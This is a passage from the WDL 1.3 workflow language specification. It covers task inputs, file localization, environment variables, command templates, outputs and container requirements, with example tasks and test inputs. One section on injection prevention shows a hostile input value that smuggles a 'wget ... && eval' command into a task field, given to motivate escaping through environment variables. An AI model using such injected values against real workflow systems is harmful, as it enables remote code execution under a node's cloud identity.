If incompatible enums with the same name are imported, an error is raised. Use the alias clause to resolve naming conflicts:
import "lib_a.wdl" alias Status as StatusA
import "lib_b.wdl" alias Status as StatusB
Task Definition
A WDL task can be thought of as a template for running a set of commands - specifically, a Bash script - in a manner that is (ideally) independent of the execution engine and the runtime environment.
A task is defined using the task keyword, followed by a task name that is unique within its WDL document.
Tasks are comprised of the following elements:
- A single, optional
inputsection, which defines the inputs for the task. - A single, required
command, which defines the Bash script to be executed. - A single, optional
outputsection, which defines the outputs for the task. - A single, optional
requirementssection, which defines the minimum, required runtime environment conditions. - A single, optional
hintssection, which provides hints to the execution engine. - ๐๏ธ A single, optional
runtimesection, which defines the runtime environment conditions. This is mutually exclusive with therequirementsandhintssections. - A single, optional
metasection, which defines task-level metadata. - A single, optional
parameter_metasection, which defines parameter-level metadata. - Any number of private declarations.
There is no enforced order for task elements.
The execution engine is responsible for "instantiating" the shell script (i.e., replacing all references with actual values) in an environment that meets all specified runtime requirements, localizing any input files into that environment, executing the script, and generating any requested outputs.
task name {
input {
# task inputs are declared here
}
# other "private" declarations can be made here
command <<<
# the command template - this section is required
>>>
output {
# task outputs are declared here
}
requirements {
# runtime requirements are specified here
}
hints {
# runtime hints are specified here
}
meta {
# task-level metadata can go here
}
parameter_meta {
# metadata about each input/output parameter can go here
}
}
Task Inputs
A task's input section declares its input parameters. The values for declarations within the input section may be specified by the caller of the task. An input declaration may be initialized to a default expression to use when the caller does not supply a value. Input declarations with the optional type quantifier ? also may be omitted by the caller even when there is no default initializer. If an input declaration has neither an optional type nor a default initializer, then it is a required input, meaning the caller must specify a value.
Example: task_inputs_task.wdl
version 1.3
task task_inputs {
input {
Int i # a required input parameter
String s = "hello" # an input parameter with a default value
File? f # an optional input parameter
Directory? d = "/etc" # an optional input parameter with a default value
}
command <<<
for i in 1..~{i}; do
printf "~{s}\n"
done
if ~{defined(f)}; then
cat ~{f}
fi
>>>
}
version 1.3
task task_inputs {
input {
Int i # a required input parameter
String s = "hello" # an input parameter with a default value
File? f # an optional input parameter
Directory? d = "/etc" # an optional input parameter with a default value
}
command <<<
for i in 1..~{i}; do
printf "~{s}\n"
done
if ~{defined(f)}; then
cat ~{f}
fi
>>>
}
Example input:
{
"task_inputs.i": 1
}
Task Input Localization
File and Directory inputs may require localization to the execution environment. For example, a file located on a remote web server that is provided to the execution engine as an https:// URL must first be downloaded to the machine where the task is being executed.
Files andDirectorys are localized into the execution environment prior to evaluating any expressions. This means that references toFileorDirectorydeclarations in input declaration expressions, private declaration expressions, and the command section are always replaced with the local paths to those files/directories.- When multiple input declarations refer to the same canonicalized
FileorDirectory(i.e., they compare as equal), the execution engine should localize the resource once, and all references to those declarations should resolve to the same localized path. - When localizing a
FileorDirectory, the engine may choose to place the local resource wherever it likes so long as it adheres to these rules:- The original file/directory name (the "basename") must be preserved even if the path to it has changed.
- Two distinct input files with the same basename must be located separately, to avoid name collision. Note that this refers to two different files (that would not compare as equal), not to multiple input declarations that reference the same underlying file.
- Two input files that originate from the same "parent" must be localized into the same directory for task execution.
- For local paths, "parent" means the parent directory.
- For remote paths specified as a URI, "parent" means the entire URI up to the last '/' of the path (i.e., excluding the final component and any parameters). For example, http://foo.com/bar/a.txt and http://foo.com/bar/b.txt have the same parent (http://foo.com/bar/), so they must be localized into the same directory.
- For remote paths specified by other means, it is up to the execution engine to determine what is meant by "parent".
- See the special case handling for Versioning Filesystems below.
- When a WDL author uses a
FileorDirectoryinput in their Command Section, the absolute path to the localized file/directory is substituted when that declaration is referenced.
The above rules do not guarantee that two files will be localized to the same directory unless they originate from the same parent location. If you are writing a task for a tool that assumes two files will be co-located, then it is safest to manually co-locate them prior to running the tool. For example, the following task runs a choice caller (varcall) on a BAM file and expects the BAM's index file (.bai extension) to be in the same directory as the BAM file.
task call_choices_safe {
input {
File bam
File bai
}
String prefix = basename(bam, ".bam")
command <<<
mkdir workdir
ln -s ~{bam} workdir/~{prefix}.bam
ln -s ~{bai} workdir/~{prefix}.bam.bai
varcall --bam workdir/~{prefix}.bam > ~{prefix}.vcf
>>>
output {
File vcf = "~{prefix}.vcf"
}
}
Runtime engines should treat input Files and Directorys as read-only, e.g., by setting their permissions appropriately on the local file system, or by localizing them to a directory marked as read-only.
Note starting in WDL 2.0 engines must treat input Files and Directorys as read-only.
A common pattern for tasks that require multiple input files to be in the same directory is to create a new directory in the execution environment and soft-link the files into that directory.
task two_files_one_directory {
input {
File bam
File bai
}
String prefix = basename(bam, ".bam")
command <<<
mkdir inputs
ln -s ~{bam} inputs/~{prefix}.bam
ln -s ~{bai} inputs/~{prefix}.bam.bai
varcall inputs/~{prefix}.bam
>>>
}
Special Case: Versioning Filesystem
Two or more versions of a file in a versioning filesystem might have the same name and come from the same directory. In that case, the following special procedure must be used to avoid collision:
- The first file is always placed according to the rules above.
- Subsequent files that would otherwise overwrite this file are instead placed in a subdirectory named for the version.
For example, imagine two versions of file fs://path/to/A.txt are being localized (labeled version 1.0 and 1.1). The first might be localized as /execution_dir/path/to/A.txt. The second must then be placed in /execution_dir/path/to/1.1/A.txt
Input Type Constraints
Recall that a type may have a quantifier:
?means that the input is optional and a caller does not need to specify a value for the input.*+applies only toArraytypes and it represents a constraint that theArrayvalue must contain one-or-more elements.
The following task has several inputs with type quantifiers:
Example: input_type_quantifiers_task.wdl
version 1.3
task input_type_quantifiers {
input {
Array[String] a
Array[String]+ b
Array[String]? c
# If the next line were uncommented it would cause an error
# + only applies to Array, not File
#File+ d
# An optional array that, if defined, must contain at least one element
Array[String]+? e
}
command <<<
cat ~{write_lines(a)} >> result
cat ~{write_lines(b)} >> result
~{if defined(c) then
"cat ~{write_lines(select_first([c]))} >> result"
else ""}
~{if defined(e) then
"cat ~{write_lines(select_first([e]))} >> result"
else ""}
>>>
output {
Array[String] lines = read_lines("result")
}
requirements {
container: "ubuntu:latest"
}
}
version 1.3
task input_type_quantifiers {
input {
Array[String] a
Array[String]+ b
Array[String]? c
# If the next line were uncommented it would cause an error
# + only applies to Array, not File
#File+ d
# An optional array that, if defined, must contain at least one element
Array[String]+? e
}
command <<<
cat ~{write_lines(a)} >> result
cat ~{write_lines(b)} >> result
~{if defined(c) then
"cat ~{write_lines(select_first([c]))} >> result"
else ""}
~{if defined(e) then
"cat ~{write_lines(select_first([e]))} >> result"
else ""}
>>>
output {
Array[String] lines = read_lines("result")
}
requirements {
container: "ubuntu:latest"
}
}
Example input:
{
"input_type_quantifiers.a": [],
"input_type_quantifiers.b": ["A", "B"],
"input_type_quantifiers.e": ["C"]
}
Example output:
{
"input_type_quantifiers.lines": ["A", "B", "C"]
}
If these input values are provided:
| input | value |
|---|---|
a | ["1", "2", "3"] |
b | [] |
the task will fail with an error, because test.b is required to have at least one element.
On the other hand, if these input values are provided:
| var | value |
|---|---|
a | ["1", "2", "3"] |
b | ["x"] |
the task will run successfully (c and d are not required). Given these values, the command would be instantiated as:
cat /tmp/file1 >> result
cat /tmp/file2 >> result
If the inputs were:
| var | value |
|---|---|
a | ["1", "2", "3"] |
b | ["x", "y"] |
c | ["a", "b", "c", "d"] |
then the command would be instantiated as:
cat /tmp/file1 >> result
cat /tmp/file2 >> result
cat /tmp/file3 >> result
Optional inputs with defaults
Inputs with default initializers are implicitly optional: callers may omit the input or supply None whether or not its declared type carries the optional quantifier ?. Usually, inputs with defaults should omit the ? from their type, except when callers need the ability to override the default with None.
In detail, if a caller omits an input from the call input: section, then the default initializer applies whether or not the input type is declared optional. But if the caller explicitly supplies None for the input (either literally or by passing an optional value), then the default initializer applies only if the declared type isn't optional. This table illustrates the value taken by an input x depending on what the caller supplies:
| input declaration: | Int x = 1 | Int? x = 1 | Int? x | Int x |
|---|---|---|---|---|
call input: x = 42 | 42 | 42 | 42 | 42 |
call input: x = None | 1 | None | None | error |
| call input: omitted | 1 | 1 | None | error |
Example: optional_with_default.wdl
version 1.3
task say_hello {
input {
String name
String? salutation = "hello"
}
command <<< >>>
output {
String greeting = if defined(salutation) then "~{salutation} ~{name}" else name
}
}
workflow optional_with_default {
input {
String name
Boolean use_salutation
}
if (use_salutation) {
call say_hello {
name = name
}
} else {
call say_hello {
name = name,
salutation = None
}
}
output {
String greeting = say_hello.greeting
}
}
version 1.3
task say_hello {
input {
String name
String? salutation = "hello"
}
command <<< >>>
output {
String greeting = if defined(salutation) then "~{salutation} ~{name}" else name
}
}
workflow optional_with_default {
input {
String name
Boolean use_salutation
}
if (use_salutation) {
call say_hello {
name = name
}
} else {
call say_hello {
name = name,
salutation = None
}
}
output {
String greeting = say_hello.greeting
}
}
Example input:
{
"optional_with_default.name": "John",
"optional_with_default.use_salutation": false
}
Example output:
{
"optional_with_default.greeting": "John"
}
Private Declarations
A task can have declarations that are intended as intermediate values rather than inputs. These private declarations may appear anywhere in the body of the task, and they must be initialized. Just like input declarations, private declarations may be initialized with literal values, or with expressions that may reference other declarations.
For example, this task takes an input and then performs a calculation, using a private declaration, that can then be referenced in the command template:
Example: private_declaration_task.wdl
version 1.3
task private_declaration {
input {
Array[String] lines
}
Int num_lines = length(lines)
Int num_lines_clamped = if num_lines > 3 then 3 else num_lines
command <<<
head -~{num_lines_clamped} ~{write_lines(lines)}
>>>
output {
Array[String] out_lines = read_lines(stdout())
}
}
version 1.3
task private_declaration {
input {
Array[String] lines
}
Int num_lines = length(lines)
Int num_lines_clamped = if num_lines > 3 then 3 else num_lines
command <<<
head -~{num_lines_clamped} ~{write_lines(lines)}
>>>
output {
Array[String] out_lines = read_lines(stdout())
}
}
Example input:
{
"private_declaration.lines": ["A", "B", "C", "D"]
}
Example output:
{
"private_declaration.out_lines": ["A", "B", "C"]
}
The value of a private declaration may not be specified by the task caller, nor is it accessible outside of the task scope.
Example: private_declaration_fail.wdl
version 1.3
task test {
input {
Int i
}
String s = "hello"
command <<< ... >>>
output {
String out = "goodbye"
}
}
workflow private_declaration_fail {
call test {
i = 1, # this is fine - "i" is in the input section
s = "goodbye" # error! "s" is private
}
output {
String out = test.out # this is fine - "out" is in the output section
String s = test.s # error! "s" is private
}
}
version 1.3
task test {
input {
Int i
}
String s = "hello"
command <<< ... >>>
output {
String out = "goodbye"
}
}
workflow private_declaration_fail {
call test {
i = 1, # this is fine - "i" is in the input section
s = "goodbye" # error! "s" is private
}
output {
String out = test.out # this is fine - "out" is in the output section
String s = test.s # error! "s" is private
}
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
Environment Variables
Any input to a task may be converted into an environment variable that will be accessible from within the task's
shell environment during command execution. Unlike inputs, environment variables are not interpolated in the command when
preparing the execution script, but are actually available at runtime directly from the environment. They may be accessed using
normal shell variable access semantics (i.e. $FOO or ${FOO}).
In order to access an input value as an environment variable, you can add the env modifier preceding a declaration anywhere
within the task. This applies to declarations within the input section as well as private declarations.
An important thing to note is that while the env modifier makes the declaration available in the
environment, it does not change its access to normal WDL expressions within a command. That means you can refer to a declaration
annotated with env either through the shell semantics (${FOO}) or through normal WDL semantics (~{FOO}).
When an input is annotated with env it is the engine's responsibility to serialize the value appropriately into a string (see section on Serialization of WDL values)
that will then be set as an environment variable. Engines may impose limits on the total length a single environment variable is allowed to occupy as well as the number of environment variables that are allowed to be passed into a single task.
If such limitations exist, it is the engine's responsibility to provide clear documentation outlining what they are for the user.
The environment variable should be evaluated by the engine prior to injecting it into the execution environment. if the task is run in a container the env var is "injected" into the container and not applied to the shell on the host that runs the container.
Example: environment_variable_should_echo.wdl
version 1.3
task test {
input {
env String greeting
}
command <<<
echo $greeting
>>>
output {
String out = read_string(stdout())
}
}
workflow environment_variable_should_echo {
input {
String greeting
}
call test {
input: greeting = greeting
}
output {
String out = test.out
}
}
version 1.3
task test {
input {
env String greeting
}
command <<<
echo $greeting
>>>
output {
String out = read_string(stdout())
}
}
workflow environment_variable_should_echo {
input {
String greeting
}
call test {
input: greeting = greeting
}
output {
String out = test.out
}
}
Example input:
{
"environment_variable_should_echo.greeting": "hello"
}
Example output:
{
"environment_variable_should_echo.out": "hello"
}
String Escaping and Injection Prevention
Environment variables provide a mechanism to pass a value to a command which would otherwise be considered unsafe.
For example, in some cloud environments, any code run within a task is given the same identity and permissions as the node that the task is running on, without needing to perform any additional authentication mechanisms. A bad actor could construct a string to pass into a task which then performs a privileged operation as the node's identity. It's important to note that this can happen even if only validated workflows are allowed by the execution engine (Which is possibly the case when dealing with restricted data).
Imagine the task looks something like the following:
task some_task {
input {
String thing_to_do
}
command <<<
echo ${thing_to_do}
>>>
You could then construct an input that downloads a file, and attempts to gain access to anything that the said node has access to.
{
"some_workflow.some_task":"\nwget bad-script.sh && eval bad-script.sh"
}
While the example above illustrates how a user of workflow may submit a bad value, there could possibly be many other sources of injection attacks. As workflows become dependent on other community generated workflows and files, it becomes quite easy to generate a source of an attack to perform some nefarious purpose.
Using environment variables mitigates this problem almost entirely. When a value is declared with the env modifier, it becomes the execution engine's responsibility to escape the string thus preventing any sort of interpolation. Functionally, using an environment variable is the same as first escaping the string of any special characters and then wrapping it single quotes.
single_quote(escape(${variable}))
Command Section
The command section is the only required task section. It defines the command template that is evaluated to produce a Bash script that is executed within the task's container. Specifically, the commands are executed after all of the inputs are staged and before the outputs are evaluated. There may be any number of commands within a command section.
There are two different syntaxes that can be used to define the command section:
# HEREDOC style - this way is preferred
command <<< ... >>>
# older style - may be preferable in some cases
command { ... }
The command template is evaluated after all of the inputs are staged and before the outputs are evaluated. The command template is evaluated similarly to multi-line strings:
- Remove all whitespace following the opening
<<<, up to and including a newline (if any). - Remove all whitespace preceeding the closing
>>>, up to and including a newline (if any). - Use all remaining non-blank lines to determine the common leading whitespace.
- Remove common leading whitespace from each line.
- Evaluate placeholder expressions.
Notice that there is one major difference between the evaluation of multi-line strings vs the command template: line continuations are removed in the former but left as-is in the latter. This also means that continued lines are considered when determining common leading whitespace, and that common leading whitespace is removed from continued lines as well.
String s = <<<
This string has \
no newlines
>>>
command <<<
echo "~{s}"
echo "This command has line continuations \
that still appear in the Bash script \
after evaluation"
>>>
When the above command template is evaluated the resulting Bash script is:
echo "This string has no newlines"
echo "This command has line continuations \
that still appear in the Bash script \
after evaluation"
For another example, consider a task that calls the python interpreter with an in-line Python script:
task heredoc {
input {
File infile
}
command <<<
python <<CODE
with open("~{in}") as fp:
for line in fp:
if not line.startswith('#'):
print(line.strip())
CODE
>>>
....
}
Given an infile value of /path/to/file, the execution engine produces the following Bash script, which has removed the 4 spaces that were common to the beginning of each line:
python <<CODE
with open("/path/to/file") as fp:
for line in fp:
if not line.startswith('#'):
print(line.strip())
CODE
Each whitespace character is counted once regardless of whether it is a space or tab, so care should be taken when mixing whitespace characters. For example, if a command block has two lines, and the first line begins with <space><space><space><space>, and the second line begins with <tab> then only one whitespace character is removed from each line.
The characters that must be escaped within a command section are different from those that must be escaped in regular strings:
- Unescaped newlines (
\n) are allowed. - An unescaped backslash (
\) may appear as the last character on a line - this is treated as a line continuation. - In a HEREDOC-style command section, if there are exactly three consecutive right-angle brackets (
>>>), then at least one of them must be escaped, e.g.\>>>. - In the older-style command section, any right brace (
}) that is not part of an expression placeholder must be escaped.
Expression Placeholders
The command "template" can be thought of as a single string expression, which (like all string expressions) may contain placeholders.
There are two different syntaxes that can be used to define command expression placeholders, depending on which style of command section definition is used:
| Command Definition Style | Placeholder Style |
|---|---|
command <<< >>> | ~{} only |
command { ... } | ~{} (preferred) or ${} |
Note that the restriction on using ${} only applies to the HEREDOC-style command section - it may be used interchangeably with ~{} in string expressions including multi-line strings.
Any valid WDL expression may be used within a placeholder. For example, a command might reference an input to the task. The expression can also be more complex, such as a function call.
Example: test_placeholders_task.wdl
version 1.3
task test_placeholders {
input {
File infile
}
command <<<
# The `read_lines` function reads the lines from a file into an
# array. The `sep` function concatenates the lines with a space
# (" ") delimiter. The resulting string is then printed to stdout.
printf "~{sep(" ", read_lines(infile))}"
>>>
output {
# The `stdout` function returns a file with the contents of stdout.
# The `read_string` function reads the entire file into a String.
String result = read_string(stdout())
}
}
version 1.3
task test_placeholders {
input {
File infile
}
command <<<
# The `read_lines` function reads the lines from a file into an
# array. The `sep` function concatenates the lines with a space
# (" ") delimiter. The resulting string is then printed to stdout.
printf "~{sep(" ", read_lines(infile))}"
>>>
output {
# The `stdout` function returns a file with the contents of stdout.
# The `read_string` function reads the entire file into a String.
String result = read_string(stdout())
}
}
Example input:
{
"test_placeholders.infile": "data/greetings.txt"
}
Example output:
{
"test_placeholders.result": "hello world hi_world hello nurse"
}
In this case, infile within the ~{...} placeholder is an identifier expression referencing the value of the infile input parameter that was specified at runtime. Since infile is a File declaration, the execution engine will have staged whatever file was referenced by the caller such that it is available on the local file system, and will have replaced the original value of the infile parameter with the path to the file on the local filesystem.
In most cases, the ~{} style of placeholder is preferred, to avoid ambiguity between WDL placeholders and Bash variables, which are of the form $name or ${name}. If the command { ... } style is used, then ${name} is always interpreted as a WDL placeholder, so care must be taken to only use $name style Bash variables. If the command <<< ... >>> style is used, then only ~{name} is interpreted as a WDL placeholder, so either style of Bash variable may be used.
Example: bash_variables_fail_task.wdl
version 1.3
task bash_variables {
input {
String str
}
command {
# store value of WDL declaration "str" to Bash variable "s"
s=${str}
# echo the string referenced by Bash variable "s"
printf $s
# this causes an error since "s" is not a WDL declaration
printf ${s}
}
}
version 1.3
task bash_variables {
input {
String str
}
command {
# store value of WDL declaration "str" to Bash variable "s"
s=${str}
# echo the string referenced by Bash variable "s"
printf $s
# this causes an error since "s" is not a WDL declaration
printf ${s}
}
}
Example input:
{
"bash_variables.str": "hello"
}
Example output:
{}
Test config:
{
"fail": true
}
Like any other WDL string, the command section is subject to the rules of string interpolation: all placeholders must contain expressions that are valid when analyzed statically, and that can be converted to a String value when evaluated dynamically. However, the evaluation of placeholder expressions during command instantiation is more lenient than typical dynamic evaluation as described in Expression Placeholder Coercion.
The implementation is not responsible for interpreting the contents of the command section to check that it is a valid Bash script, ignore comment lines, etc. For example, in the following task the greeting declaration is commented out, so greeting is not a valid identifier in the task's scope. However, the placeholder in the command section refers to greeting, so the implementation will raise an error during static analysis. The fact that the placeholder occurs in a commented line of the Bash script doesn't matter.
Example: bash_comment_fail_task.wdl
version 1.3
task bash_comment {
# String greeting = "hello"
command <<<
# printf "~{greeting} John!"
>>>
}
version 1.3
task bash_comment {
# String greeting = "hello"
command <<<
# printf "~{greeting} John!"
>>>
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
Stripping Leading Whitespace
When a command template is evaluated, the execution engine first strips out all common leading whitespace.
For example, consider a task that calls the python interpreter with an in-line Python script:
Example: python_strip_task.wdl
version 1.3
task python_strip {
input {
File infile
}
command<<<
python <<CODE
with open("~{infile}") as fp:
for line in fp:
if not line.startswith('#'):
print(line.strip())
CODE
>>>
output {
Array[String] lines = read_lines(stdout())
}
requirements {
container: "python:latest"
}
}
version 1.3
task python_strip {
input {
File infile
}
command<<<
python <<CODE
with open("~{infile}") as fp:
for line in fp:
if not line.startswith('#'):
print(line.strip())
CODE
>>>
output {
Array[String] lines = read_lines(stdout())
}
requirements {
container: "python:latest"
}
}
Example input:
{
"python_strip.infile": "data/comment.txt"
}
Example output:
{
"python_strip.lines": ["A", "B", "C"]
}
Given an infile value of /path/to/file, the execution engine will produce the following Bash script, which has removed the two spaces that were common to the beginning of each line:
python <<CODE
with open("/path/to/file") as fp:
for line in fp:
if not line.startswith('#'):
print(line.strip())
CODE
If the user mixes tabs and spaces, the behavior is undefined. The execution engine should, at a minimum, issue a warning and leave the whitespace unmodified, though it may choose to raise an exception or to substitute e.g. 4 spaces per tab.
Task Outputs
The output section contains declarations that are exposed as outputs of the task after the successful execution of the instantiated command. An output declaration must be initialized, and its value is evaluated only after the task's command completes successfully, enabling any files generated by the command to be used to determine its value.
Example: outputs_task.wdl
version 1.3
task outputs {
input {
Int t
}
command <<<
printf ~{t} > threshold.txt
touch a.csv b.csv
>>>
output {
Int threshold = read_int("threshold.txt")
Array[File]+ csvs = glob("*.csv")
Boolean two_csvs = length(csvs) == 2
}
}
version 1.3
task outputs {
input {
Int t
}
command <<<
printf ~{t} > threshold.txt
touch a.csv b.csv
>>>
output {
Int threshold = read_int("threshold.txt")
Array[File]+ csvs = glob("*.csv")
Boolean two_csvs = length(csvs) == 2
}
}
Example input:
{
"outputs.t": 5
}
Example output:
{
"outputs.threshold": 5,
"outputs.two_csvs": true
}
Test config:
{
"exclude_outputs": ["outputs.csvs"]
}
After the command is executed, the following outputs are expected to be found in the task execution directory:
- A file called "threshold.txt", which contains one line that consists of only an integer and whitespace.
- One or more files (as indicated by the
+postfix quantifier) with the.csvextension in the working directory that are collected into an array by theglobfunction.
See the WDL Value Serialization section for more details.
File, Directory, and Optional Outputs
File and Directory outputs are represented as path strings.
A common pattern is to use a placeholder in a string expression to construct a file name as a function of the task input. For example:
Example: file_output_task.wdl
version 1.3
task file_output {
input {
String prefix
}
command <<<
printf "hello" > ~{prefix}.hello
printf "goodbye" > ~{prefix}.goodbye
>>>
output {
Array[String] basenames = [basename("~{prefix}.hello"), basename("~{prefix}.goodbye")]
}
}
version 1.3
task file_output {
input {
String prefix
}
command <<<
printf "hello" > ~{prefix}.hello
printf "goodbye" > ~{prefix}.goodbye
>>>
output {
Array[String] basenames = [basename("~{prefix}.hello"), basename("~{prefix}.goodbye")]
}
}
Example input:
{
"file_output.prefix": "foo"
}
Example output:
{
"file_output.basenames": ["foo.hello", "foo.goodbye"]
}
In the preceding example, if prefix were specified as "foobar", then "~{prefix}.out" would be evaluated to "foobar.out".
Another common pattern is to use the glob function to define outputs that might contain zero, one, or many files.
Example: glob_task.wdl
version 1.3
task glob {
input {
Int num_files
}
command <<<
for i in {1..~{num_files}}; do
printf ${i} > file_${i}.txt
done
>>>
output {
Array[File] outfiles = glob("*.txt")
Int last_file_contents = read_int(outfiles[num_files-1])
}
}
version 1.3
task glob {
input {
Int num_files
}
command <<<
for i in {1..~{num_files}}; do
printf ${i} > file_${i}.txt
done
>>>
output {
Array[File] outfiles = glob("*.txt")
Int last_file_contents = read_int(outfiles[num_files-1])
}
}
Example input:
{
"glob.num_files": 3
}
Example output:
{
"glob.last_file_contents": 3
}
Test config:
{
"exclude_outputs": ["glob.outfiles"]
}
Relative paths are interpreted relative to the execution directory, whereas absolute paths are interpreted in a container-dependent way. Absolute paths that reference locations outside the task's execution directory may not be supported by all execution engines, particularly in environments where access to the container's filesystem is restricted.
Example: relative_and_absolute_task.wdl
version 1.3
task relative_and_absolute {
command <<<
mkdir -p my/path/to
printf "something" > my/path/to/something.txt
>>>
output {
String something = read_string("my/path/to/something.txt")
# The following may or may not work depending on what the execution engine
# supports.
#
# File bashrc = "/root/.bashrc"
}
requirements {
container: "ubuntu:focal"
}
}
version 1.3
task relative_and_absolute {
command <<<
mkdir -p my/path/to
printf "something" > my/path/to/something.txt
>>>
output {
String something = read_string("my/path/to/something.txt")
# The following may or may not work depending on what the execution engine
# supports.
#
# File bashrc = "/root/.bashrc"
}
requirements {
container: "ubuntu:focal"
}
}
Example input:
{}
Example output:
{
"relative_and_absolute.something": "something"
}
All File and Directory outputs are required to exist when the output section is evaluated (i.e., when the output values are created), otherwise the task will fail. However, an output may be declared as optional (e.g. File?, Directory?, or Array[File?]), in which case the value will be undefined if the file does not exist.
Example: optional_output_task.wdl
version 1.3
task optional_output {
input {
Boolean make_example2
}
command <<<
printf "1" > example1.txt
if ~{make_example2}; then
printf "2" > example2.txt
fi
>>>
output {
File example1 = "example1.txt"
File? example2 = "example2.txt"
Array[File?] file_array = ["example1.txt", "example2.txt"]
Int file_array_len = length(select_all(file_array))
}
}
version 1.3
task optional_output {
input {
Boolean make_example2
}
command <<<
printf "1" > example1.txt
if ~{make_example2}; then
printf "2" > example2.txt
fi
>>>
output {
File example1 = "example1.txt"
File? example2 = "example2.txt"
Array[File?] file_array = ["example1.txt", "example2.txt"]
Int file_array_len = length(select_all(file_array))
}
}
Example input:
{
"optional_output.make_example2": false
}
Example output:
{
"optional_output.example2": null,
"optional_output.example1": "example1.txt",
"optional_output.file_array": ["example1.txt", null],
"optional_output.file_array_len": 1
}
Test config:
{
"exclude_outputs": ["optional_output.example1", "optional_output.file_array"]
}
Executing the above task with make_example2 = true will result in the following outputs:
optional_output.example1will resolve to aFileoptional_output.example2will resolve toNoneoptional_output.file_arraywill resolve to[<File>, None]
The execution engine may need to "de-localize" File and Directory outputs. For example, if the WDL is executed on a cloud instance, then the outputs must be copied to cloud storage after execution completes successfully.
When a File or Directory is de-localized, its name and contents (including subdirectories) are preserved, but not necessarily its local path. Any hard- or soft-links shall be resolved into regular files/directories.
For example, if a task produces the following Directory output:
dir/
- a # a file, 10 MB
- b -> a # a softlink to 'a'
Then, after de-localization, it would be:
dir/
- a # a file, 10 MB
- b # another file, 10 MB
If this were then passed to the Directory input of another task, it would contain two independent files, dir/a and dir/b, with identical contents.
WDL does not have any built-in way to specify that an output Directory should only contain a subset of files in the local directory, so a common pattern is to create an output directory with the desired structure and soft-link the desired output files into that directory.
task output_subset {
command <<<
for i in 1..10; do
touch file${i}
done
# we only want the first three files in the output directory
mkdir -p outdir/subdir
ln -s file1 outdir
ln -s file2 outdir
ln -s file3 outdir/subdir
>>>
output {
Directory outdir = "outdir"
}
}
Evaluation of Task Declarations
All non-output declarations (i.e., input and private declarations) must be evaluated prior to evaluating the command section.
Input and private declarations may appear in any order within their respective sections and they may reference each other so long as there are no circular references. Input and private declarations may not reference declarations in the output section.
Declarations in the output section may reference any input and private declarations, and may also reference other output declarations.
Requirements Section
as of version 1.2
The requirements section defines a set of key/value pairs that represent the minimum requirements needed to run a task and the conditions under which a task should be interpreted as a failure or success. The requirements section is limited to the attributes defined in this specification. Arbitrary key/value pairs are not allowed in the requirements section, and must instead be placed in the hints section.
During execution of a task, all resource requirements within the requirements section must be enforced by the engine. If the engine is not able to provision the requested resources, then the task immediately fails.
All attributes of the requirements section have well-defined meanings and default values. Default values for the optional attributes are directly defined by the WDL specification to encourage portability of workflows and tasks; execution engines should not provide additional mechanisms to set default values for when no requirements are defined.
The value of a requirements attribute may be any expression that evaluates to the expected type - and, in some cases, matches the accepted format - for that attribute. Expressions in the requirements section may reference input and private declarations.
Example: dynamic_container_task.wdl
version 1.3
task dynamic_container {
input {
String ubuntu_version = "latest"
}
command <<<
cat /etc/*-release | grep DISTRIB_CODENAME | cut -f 2 -d '='
>>>
output {
Boolean is_true = ubuntu_version == read_string(stdout())
}
requirements {
container: "ubuntu:~{ubuntu_version}"
}
}
version 1.3
task dynamic_container {
input {
String ubuntu_version = "latest"
}
command <<<
cat /etc/*-release | grep DISTRIB_CODENAME | cut -f 2 -d '='
>>>
output {
Boolean is_true = ubuntu_version == read_string(stdout())
}
requirements {
container: "ubuntu:~{ubuntu_version}"
}
}
Example input:
{
"dynamic_container.ubuntu_version": "focal"
}
Example output:
{
"dynamic_container.is_true": true
}
Units of Storage
Several of the requirements attributes (and some Standard Library functions) accept a string value with an optional unit suffix, using one of the valid SI or IEC abbreviations. At a minimum, execution engines must support the following suffices in a case-insensitive manner:
- B (bytes)
- Decimal: KB, MB, GB, TB
- Binary: KiB, MiB, GiB, TiB
Optional whitespace is allowed between the number/expression and the suffix. For example: 6.2 GB, 5MB, "~{ram}GiB".
The decimal and binary units may be shortened by omitting the trailing "B". For example, "K" and "KB" are both interpreted as "kilobytes".
Requirements attributes
The following attributes must be supported by the execution engine. The value for each of these attributes must be defined - if it is not specified by the user, then it must be set to the specified default value.
container
- Accepted types:
"*": This special value indicates that the runtime engine may use any POSIX-compliant operating environment it wishes to execute the task, whether that be a container or directly in the host environment.String: A single container URI.Array[String]: An array of container URIs.
- Default value:
"*" - Alias:
docker
The container attribute accepts a URI string that describes a container resource the execution engine can use when executing the task.
It is strongly suggested to specify a container for every task. If container is not specified, or is specified with the special "*" value, the execution behavior is determined by the execution engine. A task that depends on the engine to determine the execution environment should be careful to only use built-in Bash operations and tools specified as mandatory by the POSIX standard.
The format of a container URI is protocol://location, where protocol is one of the protocols supported by the execution engine. Execution engines must, at a minimum, support the docker protocol. If only location is specified, the protocol is assumed to be docker. An execution engine should ignore any URI with a protocol it does not support.
A container location uses the syntax defined by the container repository. For example, the URI ubuntu:latest refers to a Docker image hosted on DockerHub, while the URI quay.io/bitnami/python refers to an image in a quay.io repository. To promote reproducibility, it is recommended to use the most specific possible URI to refer to a container; e.g. for Docker, using the digest or a specific version tag rather than latest.
The container attribute also accepts an unordered array of URI strings. All the URIs must resolve to containers that are equivalent. In other words, when given the same inputs the task should produce the same outputs regardless of which of the containers is used to execute the task. It is the responsibility of the execution engine to specify the container protocols and locations it supports, and to determine which container is the "best" one to use at runtime. Defining multiple images enables greater portability across a broad range of execution environments.
If the value is a String or Array[String] and none of the specified containers can be sucessfully resolved by the exeution engine, the task fails with an error.
Example: test_containers.wdl
version 1.3
task single_image_task {
command <<< printf "hello" >>>
output {
String greeting = read_string(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
task multi_image_task {
command <<< printf "hello" >>>
output {
String greeting = read_string(stdout())
}
requirements {
container: ["ubuntu:latest", "https://gcr.io/standard-images/ubuntu:latest"]
}
}
workflow test_containers {
call single_image_task
call multi_image_task
output {
String single_greeting = single_image_task.greeting
String multi_greeting = multi_image_task.greeting
}
}
version 1.3
task single_image_task {
command <<< printf "hello" >>>
output {
String greeting = read_string(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
task multi_image_task {
command <<< printf "hello" >>>
output {
String greeting = read_string(stdout())
}
requirements {
container: ["ubuntu:latest", "https://gcr.io/standard-images/ubuntu:latest"]
}
}
workflow test_containers {
call single_image_task
call multi_image_task
output {
String single_greeting = single_image_task.greeting
String multi_greeting = multi_image_task.greeting
}
}
Example input:
{}
Example output:
{
"test_containers.single_greeting": "hello",
